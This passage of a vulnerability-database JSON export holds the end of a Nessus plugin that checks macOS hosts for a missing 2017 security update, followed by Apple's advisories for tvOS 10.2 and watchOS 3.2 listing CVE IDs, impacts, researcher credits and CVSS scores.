and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.(10\\.5|11\\.6)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.10.5 or Mac OS X 10.11.6\");\n\nif ( \"10.10.5\" >< os) patch = \"2017-001\";\nelse if ( \"10.11.6\" >< os ) patch = \"2017-001\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += 
str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2022-02-01T00:00:00", "description": "# About the security content of tvOS 10.2\n\nThis document describes the security content of tvOS 10.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform 
Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input 
validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was 
addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS 
connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: natashenka of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through 
improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. 
This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of tvOS 10.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", 
"CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:C3300089BE0D932332C0D20113B0C302", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:50", "description": "# About the security content of watchOS 3.2\n\nThis document describes the security content of watchOS 3.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 3.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, 
Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. 
These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved 
locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**libarchive**\n\nAvailable for: All Apple Watch models\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: All Apple Watch models\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: All Apple Watch models\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 04, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of watchOS 3.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", 